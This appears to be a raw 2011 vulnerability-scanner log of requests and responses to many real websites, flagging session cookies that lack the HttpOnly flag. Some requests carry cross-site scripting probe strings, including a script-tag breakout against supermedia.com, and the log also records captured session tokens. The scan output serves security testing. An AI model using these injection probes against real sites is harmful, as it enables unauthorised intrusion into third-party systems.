GET / HTTP/1.1 Host: www.bizfind.us Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:00:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 15367 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=PLLOGJOBELDIIOJMCOMKFGEL; path=/ Cache-control: private
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Bizfind - PORTAL OF USA COMPANIES</title> <meta name="descrip ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1 Host: www.bizfind.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 21:48:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11262 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=MBEEKNBBLDIKBKLLPOJKBBJH; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1 Host: www.bizfind.us Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:00:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11262 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=FHLOGJOBGLJDLKGKDICEMEGL; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:00:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11710 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=HHLOGJOBEBKFBOBPFALAANON; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 02:35:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11710 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=GNNNLNBBCDCJFMEMFLPKHOHL; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.bizfind.us Proxy-Connection: Keep-Alive
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 04 Feb 2011 02:36:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Location: http://www.bizfind.us Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=CBONLNBBJDMBAKPEBCOICOPH; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.bizfind.us Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 04 Feb 2011 18:00:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Location: http://www.bizfind.us Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=AKLOGJOBBOAKPBCKBPLDNKNG; path=/ Cache-control: private
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=aEIjMQSaeS8g; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.13 Cache-Control: private P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml" Set-Cookie: JSESSIONID=aEIjMQSaeS8g; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 19:19:32 GMT Content-Length: 37731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.descargargratis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.directorystore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:19:36 GMT Set-Cookie: JSESSIONID=NK1LJBxvx22f1j4q4lQ7pLGn81QPQXGTkSvkdtZp1Gfp3kNQJx9t!1845141040!-904548398; path=/ Connection: close Content-Type: text/html; charset=ISO-8859-1 Server: Unspecified Set-Cookie: NSC_xxx-ejsfdupsztupsf=ffffffff9482e55245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:27:11 GMT;path=/;httponly Content-Length: 29576
<html > <head>
<title>Directorystore.com - Directorystore.com - Worldwide Directory Source</title> <!-- BEGIN metainfo Include --> <meta http-equ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.expertrating.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 21:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 34238 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQAAATSB=HNEHKCKAPEKPJKCMAAKCHOBB; path=/ Cache-control: private
<html> <head> <meta HTTP-EQUIV="Expires" CONTENT="Wed, 10 Jan 2000 01:01:01 GMT"> <meta name="keywords" content="Online certification, Pre employment testing, Online courses, Online testing, Sk ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.gambleaware.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gallery/postcards.php HTTP/1.1 Host: www.ksbe.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale/golf-clubs.html HTTP/1.1 Host: www.linkchina.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/troy-brown/07/287/56A/x22 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:6393265550819748814"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8umv_nS7XFzUyxeKwcm4-54LG5Af_dxZBECJyfS9zSz2oe7lnSRZnR:1296764778:7cadffe11cc6d886b438c64892ac7c2f8d826bc7"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 20:56:17 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/ Set-Cookie: bcookie="v=1&b190bc23-5ec6-4de1-a9c4-5a80edfac251"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/ Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Location: http://www.linkedin.com/pub/troy-brown/7/287/56a Content-Language: en-US Content-Length: 0 Date: Thu, 03 Feb 2011 20:26:18 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: keep-alive
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shareArticle HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 7453 Date: Thu, 03 Feb 2011 19:20:54 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/company.cfm HTTP/1.1 Host: www.macraesbluebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Location: /index.cfm Server: Microsoft-IIS/7.5 Set-Cookie: CFID=56399166;expires=Sat, 26-Jan-2041 20:27:36 GMT;path=/ Set-Cookie: CFTOKEN=20340254;expires=Sat, 26-Jan-2041 20:27:36 GMT;path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:27:35 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.made-in-china.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Modules/PostTo/Pages/ HTTP/1.1 Host: www.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productxml/?QuickList=1&ProductURL=Y&ShortName=Y&keywords=12370379&ThumbnailURL=Y HTTP/1.1 Host: www.overstock.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.qlipso.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ASPSESSIONIDASSQDSRS=GEHACPFBKDFJCIHPINDDAHOE; path=/ Cache-Control: private Content-Length: 6395 Date: Thu, 03 Feb 2011 22:03:01 GMT Connection: close Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p-aasG6JkxVvmNA HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 03 Feb 2011 22:03:02 GMT Expires: Wed, 02 Feb 2011 10:03:02 GMT Cache-control: private, max-age=0 Set-Cookie: qcVisitor=1|69|1296770582348|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:02 GMT; Path=/ Set-Cookie: JSESSIONID=64B221D97727744347E466E5663A8A8D; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
/* SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource="SP198c8\"; CstrStatus=U; campaign_track=BP%3AUpdate%20Your%20Profile%20Top
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.switchboard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rest/v2/execute.xml?apiKey=5697781E-1C60-663B-FFD8-9B49D2B56D36&method=veoh.video.findByPermalink&permalink=v18978294NGnK88j8& HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scanners/ HTTP/1.1 Host: www.waspbarcode.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
